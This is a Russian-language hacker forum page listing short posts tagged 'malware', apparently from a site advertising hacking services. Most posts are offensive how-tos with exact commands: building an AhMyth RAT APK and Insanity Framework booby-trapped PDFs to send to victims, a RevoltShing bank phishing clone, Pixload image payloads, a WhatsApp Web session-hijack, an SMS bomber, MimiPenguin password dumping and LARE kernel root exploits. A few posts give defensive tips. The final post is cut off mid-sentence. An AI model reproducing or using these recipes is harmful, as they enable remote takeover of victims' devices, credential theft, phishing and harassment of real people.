Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'вредоносное по'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 24 results

  1. Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете защитить свою флешку от проникновения различных вредоносных программ. Когда мы вставляем USB накопитель в зараженный компьютер, вирус обнаруживает новое устройство и пытается записаться на него. При этом вирус создает на устройстве файл «autorun.inf». В этом файле прописан путь к телу вируса. Соответственно, если запретить вирусу запись в файл «autorun.inf», он не сможет заражать компьютеры. Реализовать подобную защиту позволяет программа «Autostop». Она имеет 3 функции: 1. Отключение автозапуска флешек и CD/DVD. 2. Защита от autorun-вирусов. 3. Программная защита от записи. Как пользоваться: 1. После запуска программы вводим цифру 1, 2 или 3, в зависимости от того, какой способ хотим применить. 2. Затем нажимаем клавишу «Enter», чтобы способ защиты вступил в силу. Рекомендую применять первый и второй. Вот такой простой и эффективный способ имеется, чтобы защитить свою флешку от вирусов, рекомендую каждому, кто часто пользуется USB-накопителями. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как в калькуляторе можно создать двойное дно. Существует такое приложение, которое при открытии будет выглядеть как обычный калькулятор, но если ввести на нем определенное число, откроется потайное хранилище, где можно спрятать фотографии, видео, заметки и даже пользоваться секретным браузером. Калькулятор Photo Vault (https://play.google.com/store/apps/details?id=com.hld.anzenbokusucal) - для Android или Calculator# (https://apps.apple.com/gb/app/calculator-hide-photos-videos/id1165276801) для iOS, и применений ему может быть много: от простой защиты личных фото от лишних глаз, до скрытия файлов, например при досмотре смартфона таможенниками. При первом запуске вас попросят установить пароль, после чего необходимо задать секретные вопросы и указать почту для восстановления данных в случае утери PIN-кода. В настройках вы также можете создавать резервные копии, изменять внешний вид калькулятора, менять метод шифрования и восстанавливать утерянные файлы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете обнаружить и уничтожить вирусы удаленного доступа. Как известно, антивирусы не всегда палят вредоносы, а полное удаление вируса тоже не всегда помогает. Поэтому воспользуемся командной строкой и узнаем, управляет ли кто-то нашей системой помимо нас. Итак, приступим 1. Открываем командную строку от имени администратора; 2. Переходим в директорию нашего юзера с помощью команды cd C:\Users\Имя вашего профиля; 3. Далее прописываем команду netstat -b; 4. У нас появятся все активные подключения ваших программ, а также их IP адреса. Если видим незнакомый процесс, то гуглим информацию по нему. Если убедились, что это вредонос, тогда прописываем следующие команды: netstat -nbo taskkill /pid PID ВАШЕГО ФАЙЛА /F 4. Поздравляю, вы великолепны! Если вы обнаружили вирус, вы также увидите IP адрес прокси-сервера, через который он имеет доступ к вашему ПК, а значит сможете как-то воздействовать на него, тем самым еще сильнее укрепив свою позицию. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать и получить удаленный доступ к телефону. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:\Users\ваш_юзер>\AhMyth\Output Готово! Теперь осталось отправить жертве данный APK файл. Это отличный и эффективный способ для взлома любого телефона на базе Android. Кроме того, с помощью него очень удобно управлять устройством удаленно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать ПК при помощи PDF-файла. Так как данный формат имеет множество уязвимостей, в него легко можно "вшивать" различное вредоносное программное обеспечение. Сегодня же мы будем применять автоматизированный фреймворк Insanity Framework, который позволяет создать зараженный PDF-файл, позволяющий реализовать удаленный доступ к ПК под управлением систем Windows. Погнали! 1. Для установки используем: git clone https://github.com/4w4k3/Insanity-Framework $ cd Insanity-Framework $ chmod +x insanity.py $ ./install.sh 2. Для использования нужно ввести следующую команду: sudo python2 insanity.py В момент первого запуска устанавливаются все необходимые зависимости и открывается главное меню. В главном меню нужно выбрать первый пункт, который позволяет создавать полезную нагрузку. Затем нужно выбрать Fake Acrobat PDF. Ввести ip адрес и порт. Это отличный и эффективный метод взлома практически любого компьютера, а самое главное, что при должной сноровке он становится очень трудно обнаружимым. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье я расскажу вам о том, как заблокировать доступ к микрофону смартфона. Прямо сейчас и во время звонков другие приложения могут прослушивать вас, ведь когда-то вы дали им доступ к микрофону телефона. Чтобы навсегда избавиться от прослушки, есть полезное приложение — Micro Guard FREE для Android. Оно надёжно блокирует микрофон, чтобы никакие приложения не получили к нему доступ. В отличие от альтернатив, блокировщик защищает даже от шпионского ПО и требует минимального количества разрешений, поэтому это будет лучшим выбором среди подобных приложений. Чтобы воспользоваться этим методом, необходимо: Скачать приложение из Google Play. Открыть, передвинуть ползунок в режим «ON» и нажать на «Поиск шпионских программ». Затем нажать на «Устранить все проблемы». Разрешить включить функцию «Deep detective». Она поможет фиксировать попытки получить доступ к микрофону без вашего ведома. На iOS есть хорошая альтернатива — McAfee Mobile Security. Помимо других фич, там также есть блокировка микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной статье я хочу рассказать, почему необходимо оперативно проверять определенные файлы на вредоносное ПО. Ведь, во время серфинга в интернета и поиска нужно информации часто появляются сомнительные и ненадежные ресурсы. В ситуации когда на компьютере отсутствует антивирус полезно проверять мелкие файлы на наличие вирусов. Мало того, что использование подобных сервисов позволяет проверить вирусы по множеству различных баз данных, но также вы можете сделать это быстро и эффективно, не тратя огромное количество времени на полное сканирование компьютера. VirusTotal.com — облачная проверка файлов на вирусы. Основное преимущество сервиса в том, что проверка проходит сразу в нескольких антивирусах, что дает максимально широкую картину о безопасности файла. Подходит для оперативного анализа файла, не более. Компания заботится о своем продукте, сервис абсолютно бесплатен, регулярные обновления баз и миллионы пользователей по всему миру. Работать может со ссылками, файлами и анализировать даже страницу сайта. Ссылка - http://VirusTotal.com Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! Перед вами очень полезный лайфхак на все случаи жизни. Флэшки в моде при любой погоде. 1. Переходим в «Этот компьютер» → кликаем ПКМ по иконке флешки → нажимаем «Форматировать». 2. На вкладке «Файловая система» выбираем NTFS → в блоке «Способы форматирования» ставим галочку перед «Быстрое (очистка оглавления)» → нажимаем «Начать». └ Форматирование уничтожит все данные на флешке. 3. Заходим на флешку → создаем папку с любым названием → возвращаемся обратно в «Этот компьютер». 4. Кликаем ПКМ по иконке флешки → заходим в «Свойства» → переходим на вкладку «Безопасность» → нажимаем «Изменить». 5. Убираем галочки перед всеми пунктами, кроме «Список содержимого папки» и «Чтение» → нажимаем «Применить». └ Готово! Флешка «в домике»: файлы ни скопировать, ни создать, ни переименовать, но это не конец! Сейчас носитель заблокирован полностью: загрузить файлы не может даже владелец. Needs repairing! 6. Кликаем ПКМ по созданной на флешке папке (см. пункт 3) → выбираем «Свойства» → переходим на вкладку «Безопасность» → нажимаем «Изменить»; 7. Ставим галочку перед пунктом «Полный доступ» → нажимаем «Применить»; 8. Поздравляю, вы великолепны! Так мы открыли возможность переносить файлы в папку: чтобы использовать носитель по назначению. Примечание: именно в папку! В сам корень флешки ничего скопировать нельзя. А вот в папку — welcome! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! В данной статье я хочу рассказать о том, как можно сломать телефон при помощи простой Fork-бомбы. Fork-бомба — вредоносная или ошибочно написанная программа, бесконечно создающая свои копии. Выполнение такой программы вызывает большую нагрузку вычислительной системы или даже отказ в обслуживании вследствие нехватки системных ресурсов. Для начала обновляем пакеты Termux: pkg update && pkg upgrade Устанавливаем все необходимые библиотеки: pkg install git Далее клонируем инструмент с репозитория GitHub: git clone https://github.com/Terror696/Vitus2.0 Переходим в директорию инструмента: cd Vitus2.0 В директории будет находится файл VirtualXposed.apk, который можно переместить во внутреннюю память телефона: cp VirtualXposed.apk /sdcard/ Теперь осталось предать данный файл целевому пользователю, и под любым предлогом заставить нашу жертву запустить его. Это очень простой и очень мощный способ выведения из строя любого смартфона. Поэтому рекомендую быть очень аккуратным при его использовании. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! В данной статье я хотел бы поделиться вам с данным списком необходимых онлайн ресурсов, благодаря которым ты можешь проверить любой файл, полученный из недостоверного источника. А так же другой дополнительный материал, с помощью которого ты обезопасишь себя от фишинга. Советую всегда пользоваться данным ресурсами, так ты сможешь быть всегда в безопасности и быть уверенным в том, чем ты пользуешься. • Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт: http://www.untinyurl.com http://checkshorturl.com https://unshorten.me/ • Онлайн песочницы: https://threatpoint.checkpoint.com/ThreatPortal/emulation http://www.cpcheckme.com/checkme https://www.hybrid-analysis.com https://cuckoo.cert.ee https://any.run • Онлайн-антивирусы: https://www.virustotal.com/ru/ https://online.drweb.com/ • Проверка анонимности web-серфинга: https://proxy6.net/privacy http://proiptest.com/test/ Это наименьшее, что вы можете сделать для своей безопасности, но это уже будет большим плюсом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Приветствую, хакеры! Когда-то стали известны способы размещения вредоносного кода в изображении. Немногим позднее появилась атака Polyglot, когда вредоносный файл одновременно является изображением и JavaScript-кодом. В основном, это касалось файлов BMP, при этом 2 первых байта представляли 16-ричное представление символов ВМ в изображении ВМP. Далее,4 байта отвечают за размер, затем 4 нулевых байта и байты, отвечающие за смещение данных. При выполнении техники Polyglot, контролируется размер изображения, а 16-ричные символы представляются так, чтобы компьютерами интерпретировались иначе. Т.е., чтобы выполнялись как код. Соответственно, появился генератор полезной нагрузки Pixload, который создал Alexandr Savca (chinarulezzz). И который представляю Вашему вниманию. Pixload умеет сгенерировать нагрузку в файлах BMP, GIF, JPG и PNG. Работает он как с дефолтными файлами, которые прилагаются в его директории, так и может начинять небольшие произвольные файлы соответствующего формата. В отличии от других аналогичных техник, файлы не требуется конвертировать в иконки и т.п. Если кому потребуется начинка из shell-кода х86 как в старые добрые времена, то смотрим здесь и здесь Другие полезные ссылки для информации Вы найдёте на странице автора Вся информация предоставлена исключительно в рамках ознакомления и изучения проблем информационной безопасности. Категорически запрещается применение рассматриваемого инструмента в незаконных целях. Установка: # apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl # git clone https://github.com/chinarulezzz/pixload.git # cd pixload Использование: Если работать с дефолтными данными и произвольный выходной файл отсутствует, то при следующем генерировании, такой файл перезапишется. Если имеется скачанный произвольный выходной файл, то указываем на выходе его название и нагрузка запишется в него. Для удобства поместите такой файл в директорию инструмента. 1) Для файлов BMP # ./bmp.pl -output file.bmp 2) Для JPG 2 вида нагрузки, либо в параметр COMMENT, либо DQT table И именно для данного типа файлов существует лимитирование нагрузки в 64 байта и требование, чтобы файл был произвольным. ./jpg.pl -place DQT -output file.jpg ./jpg.pl -place COM -output file.jpg 3) Для PNG # ./png.pl -output file.png 4) Для GIF # ./gif.pl -output file.gif Вот пример изображения После генерирования полезной нагрузки, размер в свойствах останется неизменным, но само изображение примет минимальный размер. Опасность такие файлы представляют для посетителей ресурсов, у которых, особенно присутствует XSS-уязвимость. Например, находятся вот таким способом уязвимые ресурсы по доркам. Наличие уязвимости позволяет даже себя любимого вывести на главную страницу. Загружаются файлы если это позволяется и выполняется атака через браузеры при взаимодействии с файлом. Мы конечно не станем ничего никуда грузить и заниматься вредительством. Защитой от подобной атаки служит по-прежнему контроль javascript в браузере за счёт дополнений. И при изучении файла hex-редактором, а лучше, анализатором пакетов, можно сразу увидеть, что с файлом что-то не так и виден в нём скрипт. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Приветствую, хакеры! Да, фишинг всё ещё актуален и будет оставаться таковым и в 2021 году. RevoltShing - это достаточно хороший инструмент для осуществления фишинг-атаки. Данная утилита способна скопировать практически любой сайт. Из плюсов могу подчеркнуть приятное оформление, а также после ввода данных жертва попадает на оригинальную страницу сайта. Установка: 1. Устанавливаем репозиторий GitHub: git clone https://github.com/AngelSecurityTeam/RevoltShing 2. Переходим в директорию утилиты и устанавливаем компоненты: cd RevoltShing pip install requests pip install bs4 pip install whether Запуск: python Server.py python revoltshing.py Установка завершена. Но на этом не всё, вот дальнейший небольшой мануал: система по стандарту предложит клонировать сайт Банка Америки. Поменять настройки можно командой: edit url https:// Перенаправление меняется командой: edit url_destination https:// Для старта вписываем: start Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Приветствую, хакеры! В этой статье я покажу, как взломать WhatsApp Web через вредоносный html-файл. Первое, что нам необходимо сделать - это создать вредоносный html-файл с предварительным изображением: Веб-клиент WhatsApp сохраняет разрешенные типы документов в клиентской переменной W ["default"]. DOC_MIMES Эта переменная хранит допустимые типы Mime, используемые приложением. Поскольку зашифрованная версия документа отправляется на серверы WhatsApp, в эту переменную можно добавить новый тип Mime, такой как «text / html», чтобы обойти ограничение клиента и загрузить вредоносный HTML-документ После добавления URL-адреса вредоносного документа в клиентскую переменную клиент шифрует содержимое файла с помощью функции encryptE2Media, а затем загружает его зашифрованным как BLOB на сервер WhatsApp Более того, изменение имени и расширения документа и создание фальшивого предварительного просмотра путем изменения клиентских переменных сделает вредоносный документ более привлекательным для жертвы. Это результат: А вот, как это будет работать: как только жертва нажимает на файл, она увидит смешную кошку под объектом blob, которая является объектом html5 FileReader под web.whatsapp.com. Это означает, что мы с тобой можем получить доступ к ресурсам в браузере под web.whatsapp.com: Просто просмотрев страницу, не нажимая ни на что, данные локального хранилища жертвы будут отправлены прямиком в наши руки, что позволит нам получить его учетку. А теперь мы создадим функцию JavaScript, которая каждые 2 секунды будет проверять, есть ли в бэкэнде новые данные, и подменять локальное хранилище жертвы. Вот часть этого кода: Теперь мы будем перенаправлены на акк жертвы и можем получить к нему доступ. Веб-сайт WhatsApp не позволяет клиенту иметь более одного активного сеанса за один раз, поэтому после того, как мы украли учетку жертвы, она получит следующее сообщение: Давай немного модернизируем наш JavaScript код добавив туда следующие строки: Это код, который заставит окно браузера жертвы лагать и позволит нам управлять учетной записью без помех. Мы будем подключены к акку жертвы до тех пор, пока жертва снова не войдет в учетную запись. Закрытие браузера не приведет к нашему выходу из учетки жертвы, и мы сможем войти в учетную запись столько, сколько захотим. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  15. ВКонтакте — одна из самых продвинутых соцсетей в плане защищённости, но её пользователей всё равно очень часто в взламывают. Как хакерам это удаётся, если страница защищена паролем и привязана к номеру телефона? Пароль Пароль — самое слабое место любой учётной записи. Если злоумышленник знает ваш логин, email-адрес или номер телефона, ему остаётся только подобрать пароль. Сделать это можно разными способами: перебрать брутфорсом популярные пароли, подсмотреть, перехватить через открытую точку Wi-Fi. Если вы используете один и тот же пароль на всех сайтах, вы сильно упрощаете задачу злодею: если он взломает вашу почту и увидит в открытом виде пароль, который вы используете на других сайтах, он догадается, что он подходит к вашей странице в соцсети. Некоторые хакеры сначала ломают именно почту, а потом всё остальное. Пароли также перехватываются с помощью кейлогеров на компьютерах в общественных местах. Если вы заходите в аккаунт с чужого компьютера, подумайте, доверяете ли вы его владельцу и нет ли вероятности, что на ПК установлена программа, перехватывающая все вводимые символы. Вирусы и расширения Уводить логины и пароли могут вирусы и расширения для браузеров, запрашивающие доступ к «ВКонтакте». Кроме того, сбором этих данных могут заниматься приложения, «паразитирующи» на «ВКонтакте» (например, аудиоплееры), а также программы, расширяющие возможности соцсети или сайты, позволяющие зарабатывать на лайках, репостах, комментариях и добавлениях в друзья. Если вы пользуетесь чем-то подобным, почаще меняйте пароль — возможно, он давно уже слит и продан потенциальным мошенникам. Взлом смартфона Пароль можно сбросить по SMS, поэтому не оставляйте свой смартфон без присмотра и блокируйте устройство так, чтобы никто не смог прочитать на нём входящие сообщения. Если вы отдыхаете с компанией и уснули, а ваш смартфон защищён только сканером отпечатков пальцев, заблокируйте его так, чтобы для входа дополнительно потребовался пароль. Так его не смогут взломать, даже если подставят к сканеру ваш палец, пока вы спите. Перехват SMS У SMS есть уязвимость, которую никто не может устранить. Эта уязвимость позволяет настроить перехват SMS-сообщений и взломать аккаунт «восстановлением» пароля. В интернете полно объявлений о взломе страниц «ВКонтакте» и других аккаунтов, привязанных к номеру телефона, — хакеры пользуются именно этой уязвимостью. Как защититься от взлома? Прежде всего придумайте сложный пароль, используйте его только для этой соцсети и регулярно меняйте его на новый. Зайдите в настройки безопасности «ВКонтакте» и как минимум установите оповещения о входе в аккаунт. Также можно настроить двухфакторную аутентификацию, при которой каждый вход будет подтверждаться кодом, пришедшим по SMS. Но помните, что защитить свой аккаунт от взлома на 100% у вас всё равно не получится, поэтому не держите в нём ничего, что могло бы вас скомпрометировать.
  16. Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  17. Привет, хакеры, расскажу о способе поиска уязвимостей, которым пользуются наиболее популярные винлокеры - Petya, WannaCry и т.д. Скачав и установив данное приложение Eternal Blues, прописываете свой ip адресс и жмёте Scan, начав сканирование. Можете выбрать компьютеры, необходимые вам для использования в данных махинациях. NO RESPONSE означает уязвимость вашей операционной системе к данным эксплойтам. Чтобы устранить данную страшную уязвимость, необходимо скачать и установить патч безопасности Microsoft, патч для определенной версии операционной системы Windows 7 32 bit Windows 7 64 bit Windows 8.1 32 bit Windows 8.1 64 bit Windows 10 32 bit Windows 10 64 bit Перезагружаем компьютер. Уязвимости не представляет опасности. Данные меры являются ключевыми в обеспечении безопасности собственных данных и устройства. Рекомендую ознакомится каждому человеку с данным патчем и установить его, если ранее не выполняли подобные действия. Проигнорировав подобные уязвимости, можете стать заложником того, кто сможет использовать подобные эксплойты в вашей системе и заполучить или уничтожить персональные данные. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  18. Приветсвую, в данной статье немного расскажу о приложении, разработанным специально для аналитиков вредоносного кода. Программа является инструментов по автоматизации данного процесса, она позволяет быстро собирать, сравнивать и составлять отчеты о действиях, выполнявшие бинарный файл, работая в системе. Собственно данной программой является – SysAnalyzer Компоненты данного приложения работают на основе сравнений частей системы за определенный промежуток времени. Для этого используется механизм снапшотов, он оказывается куда эффективнее журналирования, т.к. занимает намного меньше объема памяти для извлечения информации. Во время мгновенных снимков легко распознаются различные изменения системы, после включения определенных программ и утилит. Целевые исполняемые файлы запускается в том же режиме что и система. Во время сканирования вредоносной программы, вы должны знать, что будет происходить тестовое заражение системы. Программа создает снимки несколько системных атрибутов: Запуск процессовПортыЗагрузка dllЗагрузка системный драйверовСнимок необходимых ключей реестраПрограмма станет незаменимым инструментом при сканировании различного вредоносного кода.
  19. Многие вирусописатели и хакеры используют Punto Switcher для задач кейлоггера (включая функцию дневник), не забывая установить пароль от лишних глаз. Дневник Punto Switcher поможет сохранить и упорядочить текстовую информацию, которую вы набираете на клавиатуре. Это может быть полезно для цитирования переписки в социальных сетях, на форумах и в чатах, для восстановления текста после сбоя компьютера или необратимого изменения документа и т. д. С помощью дневника Punto Switcher можно: Автоматически записывать текст из буфера обмена.Записать информацию, набираемую на клавиатуре.Сохранить выделенный текст с помощью горячих клавиш.Искать и выборочно просматривать сохраненную информацию.Удалить сохраненные записи.Стандартное место для punto-switcher-setup-4.4.3-bild-407 C:\Users\{USER}\AppData\Roaming\Yandex\Punto Switcher\User Data но файл Дневника - "diary.dat" может находится по дальше от глаз пользователя, все зависит от того куда скрывают от пользователя сам факт установки или случайное нахождение растущего файла. Мы с Вами рассмотрим такой файл с паролем, ниже на screen выделен участок в котором и находится пароль от которого нам нужно избавиться Наша задача этот блок заменить своим Код: 50 53 44 46 36 37 2B 0C 2B 4C 20 41 17 59 7B 5A 22 58 59 20 0F 19 21 14 15 2B 38 62 15 мы создали пустой файл на 1024 Кб и сохраним его с именем nopasswordDiary.dat дабы не перепутать в начало файла вставим наш код, и к нему добавим из файла diary.dat код который находился после пароля, вышел такой вот файл Дальше мы переименовываем наш файл nopasswordDiary.dat в diary.dat и копируем наш полученный файл в папку C:\Users\{USER}\AppData\Roaming\Yandex\Punto Switcher\User Data запустим Punto Switcher
  20. Всем привет, данная статья будет еще меньше предыдущей, однако я постараюсь впредь более обширные и интересные. Но все же не забывайте, данная статья является не менее информативной, ведь речь пойдет об спаме СМС на системе Android. Итак, для того чтобы начать все это нам нужно будет зайти в Плей Маркет и там установить приложение Termux. После чего открыть и в ней прописать данный код: Clear pkg update pkg install git pkg install python pkg install python2 pip2 install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab ls cd Spammer-Grab ls chmod 777 spammer.py Отлично, мы уже сделали пол дела, представьте. Теперь нам нужно только запустить данный спамер, а сделать это можно с помощью команды: python2 spammer.py номер (без +). Но как же нам остановить рассылку спама? А чтобы спамерскую атаку прекратить, нам нужно всего лишь выйти из приложения. Что хочется сказать на счет данного приложения, что с помощью обычного свайпа вправо вы сможете нажать кнопку Nes session, тем самым создать несколько атак. После нажатия кнопки прописываем: cd Spammer-Grab python2 spammer.py номер (без +) Теперь небольшое слово еще о том, как уменьшить задержку, чтобы это сделать нам нужно прописать вот эту вот команду: python2 spammer.py --delay (задержка) (номер) – Все это записываем конечно же без скобок.
  21. Всем привет, недавно моему другу написал один человек, предлагал ему некую схему для его группы. Ну друган мой конечно же согласился, но после того как тот скинул документ, его сразу же раскусили и послали куда подальше. Все это было связанно с текстовым документом Word. И так как я непосредственно работаю в этой среди, даже создавая эту статью, то я посчитал долгом рассказать о способе заражения компьютера через Word. В чем же суть данного способа? Чтобы совершить данную атаку, вам придется всеми силами своего красноречия заставить человека открыть документ Word, который вы конечно же ему отправили. А весь сок в том, что после открытия этого документа никаких уведомлений или предупреждений не будет. После того как он будет запущен, будет произведено включение OLE объекта, который ведь на внешние ресурсы. Дальше, как говорили эксперты, на ваш компьютер скачивается файл формата .rtf прямо с сервера злоумышленников. Происходит расшифровка содержимого данного файла, который производит запуск файла HTA, который как раз-таки запустит скрипт PowerShell и после этого как раз таки произойдет заражение каким-то малварем. Это позволит злоумышленнику получать много данных с вашего компьютера, пароли, адреса и так далее, которые потом могут использоваться в корыстных целях. В прошлом годы эксперты 